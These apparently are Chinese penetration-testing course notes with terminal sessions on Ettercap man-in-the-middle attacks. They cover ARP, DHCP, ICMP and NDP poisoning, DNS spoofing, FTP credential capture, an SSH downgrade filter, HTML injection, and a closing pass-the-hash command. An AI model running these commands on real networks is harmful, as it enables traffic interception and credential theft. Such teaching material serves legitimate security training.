中间人攻击 Ettercap - 统一的中间人攻击工具 - 转发MAC与本机相同,但IP与本机不同的数据包 - 支持SSH1、SSL中间人攻击 模块划分 - Snifer - MITM - Filter - Log - Plugin |
中间人攻击 Snifer - 负责数据包转发 - Unified 单网卡情况下独立完成三层包转发 始终禁用内核IP_Forward功能 - Bridge 双网卡网卡的一层MITM模式 可作为IPS过滤数据包 不可在网卡上使用(透明网桥) MITM - 把流量重定向想到ettercap主机上 - 可以使用其他工具实现MITM,ettercap之作嗅探和过滤使用 |
中间人攻击 实现MITM的方法 - ARP - ICMP ICMP路由重定向,半双工 - DHCP 修改网关地址,半双工 - Switch Port Stealing flood目标地址是本机,源地址是受害者的包 适用于ARP静态绑定的环境 - NDP IPv6协议欺骗技术 |
中间人攻击 2.4以上内核对ARP地址欺骗的约束 - 收到非请求的ARP响应包,不更新本地ARP缓存 - Ettercap适用ARP request包进行攻击 Solaris不根据ARP包更新本地ARP缓存 - Ettercap使用先发ICMP包来更新ARP缓存 |
中间人攻击 用户操作界面 - -T 文本界面 - -G 图形界面 - -C 基于文本的图形界面 - -D 后台模式 指定目标 - IPv4 : MAC/IPs/Ports - IPv6 : MAC/IPs/IPv6/Ports - /10.0.0.1-5;10.0.1.33/20-25,80,110 |
oot@k:~# ettercap -T
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
eth0 -> 00:0C:29:DB:CD:FC
fe80::20c:29ff:fedb:cdfc/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 65534 EGID 65534...
33 plugins
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Randomizing -1 hosts for scanning...
Scanning the whole netmask for -1 hosts...
Fri May 13 22:57:16 2016 [550658]
fe80::20c:29ff:fedb:cdfc:0 --> ff02::2:0 | FR (0)
0 hosts added to the hosts list...
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Fri May 13 22:57:20 2016 [551628]
fe80::20c:29ff:fedb:cdfc:0 --> ff02::2:0 | FR (0)
root@k:~# ettercap -G
root@k:~# ettercap -C
root@k:~# ettercap -D
root@k:~# ettercap 00:11:11:11:11:11 /1.1.1.1-10;11/25,80,21 /1.1.1.2/
中间人攻击 ┃ 权限 ┃ - 需要root权限打开链路层Socket连接,然后使用nobody账号运行 - 日志写入目录需要nobody有写入权 - 修改etter.conf : EC_UID=65534 基于伪造证书的SSL MITIM - Bridge模式不支持SSL MITM - openssl genrsa -out etter.ssl.crt 1024 - openssl req -new-keyetter.ssl.crt -out tmp.csr - openssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt -out tmp.new ┃ - cat tmp.new>>etrer.ssl.crt - rm -f tmp.newtmp.csr |
root@k:~# vi /etc/ettercap/etter.conf //主配置文件
############################################################################
# #
# ettercap -- etter.conf -- configuration file #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# #
############################################################################
[privs]
ec_uid = 65534 # nobody is the default
ec_gid = 65534 # nobody is the default
[mitm]
arp_storm_delay = 10 # milliseconds
arp_poison_smart = 0 # boolean
arp_poison_warm_up = 1 # seconds
arp_poison_delay = 10 # seconds
arp_poison_icmp = 1 # boolean
arp_poison_reply = 1 # boolean
arp_poison_request = 0 # boolean
arp_poison_equal_mac = 1 # boolean
dhcp_lease_time = 1800 # seconds
port_steal_delay = 10 # seconds
port_steal_send_delay = 2000 # microseconds
ndp_poison_warm_up = 1 # seconds
ndp_poison_delay = 5 # seconds
ndp_poison_send_delay = 1500 # microseconds
ndp_poison_icmp = 1 # boolean
ndp_poison_equal_mac = 1 # boolean
icmp6_probe_delay = 3 # seconds
[connections]
connection_timeout = 300 # seconds
connection_idle = 5 # seconds
connection_buffer = 10000 # bytes
connect_timeout = 5 # seconds
[stats]
sampling_rate = 50 # number of packets
[misc]
close_on_eof = 1 # boolean value
store_profiles = 1 # 0 = disabled; 1 = all; 2 = local; 3 = remote
aggressive_dissectors = 1 # boolean value
skip_forwarded_pcks = 1 # boolean value
checksum_check = 0 # boolean value
submit_fingerprint = 0 # boolean valid (set if you want ettercap to submit unknown finger prints)
checksum_warning = 0 # boolean value (valid only if checksum_check is 1)
sniffing_at_startup = 1 # boolean value
#######################################################################
#
# You can specify what DISSECTORS are to be enabled or not...
#
# e.g.: ftp = 21 enabled on port 21 (tcp is implicit)
# ftp = 2345 enabled on non standard port
# ftp = 21,453 enabled on port 21 and 453
# ftp = 0 disabled
# NOTE: some dissectors have multiple default ports, if you specify a new
# one, all the default ports will be overwritten
#dissector default port
[dissectors]
ftp = 21 # tcp 21
ssh = 22 # tcp 22
telnet = 23 # tcp 23
smtp = 25 # tcp 25
dns = 53 # udp 53
dhcp = 67 # udp 68
http = 80 # tcp 80
ospf = 89 # ip 89 (IPPROTO 0x59)
pop3 = 110 # tcp 110
#portmap = 111 # tcp / udp
vrrp = 112 # ip 112 (IPPROTO 0x70)
nntp = 119 # tcp 119
smb = 139,445 # tcp 139 445
imap = 143,220 # tcp 143 220
snmp = 161 # udp 161
bgp = 179 # tcp 179
ldap = 389 # tcp 389
https = 443 # tcp 443
ssmtp = 465 # tcp 465
rlogin = 512,513 # tcp 512 513
rip = 520 # udp 520
nntps = 563 # tcp 563
ldaps = 636 # tcp 636
telnets = 992 # tcp 992
imaps = 993 # tcp 993
ircs = 994 # tcp 993
pop3s = 995 # tcp 995
socks = 1080 # tcp 1080
radius = 1645,1646 # udp 1645 1646
msn = 1863 # tcp 1863
cvs = 2401 # tcp 2401
mysql = 3306 # tcp 3306
icq = 5190 # tcp 5190
ymsg = 5050 # tcp 5050
mdns = 5353 # udp 5353
vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903
x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003
irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669
gg = 8074 # tcp 8074
proxy = 8080 # tcp 8080
rcon = 27015,27960 # udp 27015 27960
ppp = 34827 # special case ;) this is the Net Layer code
TN3270 = 23,992 # tcp 23 992
#
# you can change the colors of the curses GUI.
# here is a list of values:
# 0 Black 4 Blue
# 1 Red 5 Magenta
# 2 Green 6 Cyan
# 3 Yellow 7 White
#
[curses]
color_bg = 0
color_fg = 7
color_join1 = 2
color_join2 = 4
color_border = 7
color_title = 3
color_focus = 6
color_menu_bg = 4
color_menu_fg = 6
color_window_bg = 4
color_window_fg = 7
color_selection_bg = 6
color_selection_fg = 6
color_error_bg = 1
color_error_fg = 3
color_error_border = 3
#
# This section includes all the configurations that needs a string as a
# parmeter such as the redirect command for SSL mitm attack.
#
[strings]
# the default encoding to be used for the UTF-8 visualization
utf8_encoding = "ISO-8859-1"
# the command used by the remote_browser plugin
remote_browser = "xdg-open http://%host%url"
#####################################
# redir_command_on/off
#####################################
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: the script must fit into one line with a maximum of 255 characters
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#---------------
# Mac Os X
#---------------
# quick and dirty way:
#redir_command_on = "ipfw -q add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface"
#redir_command_off = "ipfw -q delete set %set"
# a better solution is to use a script that keeps track of the rules interted
# and then deletes them on exit:
# redir_command_on:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
# ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3
# else
# ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules
# fi
# ----- cut here -------
# redir_command_off:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
# ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules`
# rm -f /tmp/osx_ipfw_rules
# fi
# ----- cut here -------
#---------------
# FreeBSD
#---------------
# Before OF can be used, make sure the kernel module has been loaded by
# `kldstat | grep pf.ko`. If the rusult is empty, you can load it by
# `kldload pf.ko` or add 'pf_enable="YES"' to the /etc/rc.conf and reboot.
# Check if the PF status is enabled by
# `pfctl -si | grep Status | awk '{print $2;}'`. If "Disabled", enable it with
# `pfctl -e`.
#redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to any port %port -> localhost port %rport') | pfctl -f - 2> /dev/null"
#redir_command_off = "pfctl -Psn 2> /dev/null | grep -v %port | pfctl -f - 2> /dev/null"
#---------------
# Open BSD
#---------------
# unfortunately the pfctl command does not accepts direct rules adding
# you have to use a script which executed the following command:
# ----- cut here -------
# #!/bin/sh
# rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f -
# ----- cut here -------
# it's important to remember that you need "rdr-anchor sslsniff" in your
# pf.conf in the TRANSLATION section.
#redir_command_on = "the_script_described_above %iface %port %rport"
#redir_command_off = "pfctl -a sslsniff -Fn"
# also, if you create a group called "pfusers" and have EC_GID be that group,
# you can do something like:
# chgrp pfusers /dev/pf
# chmod g+rw /dev/pf
# such that all users in "pfusers" can run pfctl commands; thus allowing non-root
# execution of redir commands.
##########
# EOF #
##########
ARP MITM 字符模式 - ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.2// -F 1.ef -P autoadd -w a.cap -l loginfo -L logall -m message 图形界面 SSL MITM - vi /etc/ettercap/etter.conf DNS欺骗 - dns_spoof插件配置文件 - vi /etc/ettercap/etter.dns |
root@k:~# ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.114// -w a.cap -l loginfo -L logall -m message
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
eth0 -> 08:00:27:DB:B2:AF
192.168.1.110/255.255.255.0
fe80::a00:27ff:fedb:b2af/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 0 EGID 0...
33 plug:ns
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Scanning for merged targets (2 hosts)...
* |======================================================>| 100.00%
3 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 14:75:90:21:4F:56
GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18
Starting Unified sniffing
Text only Interface activated ...
Hit 'h' for inline help
FTP : 74.81.178.167:21 -> USER: user123 PASS: password123
root@k:~# ettercap -T -< arp:remote -i eth0 /192.168.1.1// /192.168.1.114// -w a.cap -l loginfo -L logall.ecp logall.ecp logall.ecp.eci logall.ecp.ecp
root@k:~# gedit /etc/ettercap/etter.conf
root@k:~# gedit /etc/ettercap/etter.dns
#######################################################################
# #
# ettercap -- etter.dns -- host file for dns_spoof plugin #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
#######################################################################
# #
# Sample hosts file for dns_spoof plugin #
# #
# the format is (for A query): #
# www.myhostname.com A 168.11.22.33 #
# *.foo.com A 168.44.55.66 #
# #
# ... for a AAAA query (same hostname allowed): #
# www.myhostname.com AAAA 2001:db8::1 #
# *.foo.com AAAA 2001:db8::2 #
# #
# or to skip a protocol family (useful with dual-stack): #
# www.hotmail.com AAAA :: #
# www.yahoo.com A 0.0.0.0 #
# or for PTR query: #
# www.bar.com PTR 10.0.0.10 #
# www.google.com PTR ::1 #
#
# or for MX query (either IPv4 or IPv6): #
# domain.com MX xxx.xxx.xxx.xxx #
# domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx #
# domain3.com MX xxxx:xxxx::y #
#
# or for WINS query: #
# workgroup WINS 127.0.0.1 #
# PC* WINS 127.0.0.1 #
# #
# or for SRV query (either IPv4 or IPv6): #
# service._tcp|_udp.domain SRV 192.168.1.10:port #
# service._tcp|_udp.domain SRV [2001:db8::3]:port #
# #
# or for TXT query (value must be wrapped in double quotes): #
# google.com TXT "v=spf1 ip4:192.168.0.3/32 ~all" #
# #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests #
# so if you want to reverse poison you have to specify a plain #
# host. (look at the www.microsoft.com example) #
# #
#######################################################################
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com A 192.168.1.1
*.microsoft.com A 162.168.1.1
www.microsoft.com PTR 192.168.1.1 # Wildcards in PTR are not allowed
##########################################
# no one out there can have our domains...
#
www.alor.org A 127.0.0.1
www.naga.org A 127.0.0.1
www.naga.org AAAA 2001:db8::2
##########################################
# dual stack enabled hosts does not make life easy
# force them back to single stack
www.ietf.org A 127.0.0.1
www.ietf.org AAAA ::
www.example.org A 0.0.0.0
www.example.org AAAA ::1
###############################################
# one day we will have our ettercap.org domain
#
www.ettercap.org A 127.0.0.1
www.ettercap-project.org A 127.0.0.1
ettercap.sourceforge.net A 23.235.43.133
www.ettercap.org PTR ::1
###############################################
# some MX examples
#
alor.org MX 127.0.0.1
naga.org MX 127.0.0.1
example.org MX 127.0.0.2
microsoft.com MX 2001:db8::1ce:c01d:bee3
###############################################
# This messes up NetBIOS clients using DNS
# resolutions. I.e. Windows/Samba file sharing.
LAB-PC* WINS 127.0.0.1
###############################################
# some service discovery examples
xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269
ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389
###############################################
# little example for TXT records
#
naga.org TXT "v=spf1 ip4:192.168.1.2 ip6:2001:db8:d0b1:beef::2 -all"
# vim:ts=8:noexpandtab
----------------------------------------------------------------------------
ettercap 0.8.2 ----->Plugins----->manage the plugins----->dns_spoof(双击)
root@k:~# ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.114// -p dns_spoof
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
eth0 -> 08:00:27:DB:B2:AF
192.168.1.110/255.255.255.0
fe80::a00:27ff:fedb:b2af/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 0 EGID 0...
33 plug:ns
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Scanning for merged targets (2 hosts)...
* |======================================================>| 100.00%
3 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 14:75:90:21:4F:56
GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18
Starting Unified sniffing
Text only Interface activated ...
Hit 'h' for inline help
ARP MITM Ettercap日志查看 - etterlog -p log.eci 查看获取的密码 - etterlog -c log.ecp 列出Log中的连接 - etterlog -c -f /1.1.1.1/ log.ecp - etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa 选择相应的连接并榨取文件 |
root@k:~# etterlog -p logall.ect
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Log file version : 0.8.2
Timestamp : Thu Mya 5 23:56:43 2016 [619991]
Type : LOG_INFO
74091.178.167 TCP 21 USER: user 123 PASS: password123
root@k:~# etterlog -c logall.ecp.ecp
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Log file version : 0.8.2
Timestamp : Thu Mya 5 23:56:43 2016 [619991]
Type : LOG_INFO
Creating the connection table...
Found 2 connection...
TCP: 192.168.1.114:51700 <--> 74.91.178.167:21
TCP: 192.168.1.114:51788 <--> 74.91.178.167:21
root@k:~# etterlog -c logall.ecp
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Log file version : 0.8.2
Timestamp : Thu Mya 5 23:56:43 2016 [619991]
Type : LOG_INFO
Creating the connection table...
Found 10 connection...
TCP: 192.168.1.114:51977 <--> 13.67.53.38:443
TCP: 192.168.1.114:51798 <--> 58.250.11.124:8080
TCP: 192.168.1.114:51797 <--> 58.250.11.124:8080
TCP: 192.168.1.114:55285 <--> 124.207.160.106:53
TCP: 192.168.1.114:51796 <--> 119.147.21.204:443
TCP: 192.168.1.114:49327 <--> 124.207.160.106:53
TCP: 192.168.1.114:51795 <--> 74.91.178.167:21
TCP: 192.168.1.114:51791 <--> 74.91.178.167:21
TCP: 192.168.1.114:51794 <--> 14.215.152.238:443
TCP: 192.168.1.114:57885 <--> 224.0.0.252:5355
ARP MITM Filter - /usr/share/ettercap/ SSH-2.xx / SSH-1.99 / SSH-1.51 - etterfilter etter.filter.ssh -o ssh.ef 替换HTTP内容 - if(ip.proto == TCP && tcp.src == 80){ - msg("data on TCP 80\n"); - replace("img src=","img src=\"http://1.1.1.1/1.gif\""); - replace("IMG src=","img src=\"http://1.1.1.1/1.gif\""); - replace("IMG SRG=","img src=\"http://1.1.1.1/1.gif\""); - } |
root@k:~# cd /usr/share/ettercap
root@k:/usr/share/ettercap# ls
AUTHORS etter.fields etter.filter.pcre etterlog.dtd
doc etter.filter etter.filter.ssh etter.mime
ettercap.png etterfilter.cnt etterfilter.tbl etter.services
ettercap-small.png etter.filter.examples etter.finger.mac etter.ssl.crt
ettercap.svg etter.filter.kill etter.finger.os lua
root@k:~# gedit etter.filter.ssh
############################################################################
# #
# ettercap -- etter.filter -- filter source file #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
##
#
# This filter will substitute the SSH server response from SSH-1.99 to
# SSH-1.51, so if the server supports both ssh1 and ssh2 we will force
# it to use ssh1... ;)
# server response : SSH-2.00 only ssh2 supported
# SSH-1.99 both ssh1 and ssh2 supported
# SSH-1.51 only ssh1 supported
##
if (ip.proto == TCP) {
if (tcp.src == 22) {
if ( replace("SSH-1.99", "SSH-1.51") ) {
msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
} else {
if ( search(DATA.data, "SSH-2.00") ) {
msg("[SSH Filter] Server supports only SSH version 2\n");
} else {
if ( search(DATA.data, "SSH-1.51") ) {
msg("[SSH Filter] Server already supports only version 1\n");
}
}
}
}
}
root@k:~# etterfilter etter.filter.ssh -o ssh.ef
root@k:/usr/share/ettercap# etterfilter etter.filter.ssh -o ssh.ef
etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team
14 protocol tables loaded:
DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth
13 constants loaded:
VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP
Parsing source file 'etter.filter.ssh' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'ssh.ef' done.
-> Script encoded into 16 instructions.
root@k:/usr/share/ettercap# ls
AUTHORS etter.filter etterfilter.tbl etter.ssl.crt
doc etterfilter.cnt etter.finger.mac lua
ettercap.png etter.filter.examples etter.finger.os ssh.ef
ettercap-small.png etter.filter.kill etterlog.dtd
ettercap.svg etter.filter.pcre etter.mime
etter.fields etter.filter.ssh etter.services
root@k:/usr/share/ettercap# cat ssh.ef
root@k:/usr/share/ettercap# mv ssh.ef /root/
root@k:/usr/share/ettercap# cd
root@k:~# ettercap -Tq -M arp:remote -i eth0 /192.168.1.1// /192.168.1.114// -F ssh.ef
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
eth0 -> 08:00:27:DB:B2:AF
192.168.1.110/255.255.255.0
fe80::a00:27ff:fedb:b2af/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 0 EGID 0...
33 plug:ns
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Scanning for merged targets (2 hosts)...
* |======================================================>| 100.00%
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 14:75:90:21:4F:56
GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18
Starting Unified sniffing
Text only Interface activated ...
Hit 'h' for inline help
中间人攻击 ICMP - -M icmp:00:11:22:33:44:55/10.0.1(真是网关的MAC/IP) DHCP - -M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1(DNS) Port - -M port /1.1.1.1/ /1.1.1.2/ Ndp - -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/ |
Pass the Hash (PTH) 密码破解耗费时间资源巨大 使用密文提交给服务器直接完成身份认证 NTLM/LM是没有加盐的静态HASH密文 企业中使用ghost等工具克隆安装系统 pth-winexe -U w7%aad3b435b51404eeaadd3b435b51404ee:ed1bfaeb3063 716ab7fe2allfaf126d8 //1.1.1.1 cmd |
root@k:~# mount /dev/sha2 /mnt
root@k:~# cd /mnt/Windows/System32/config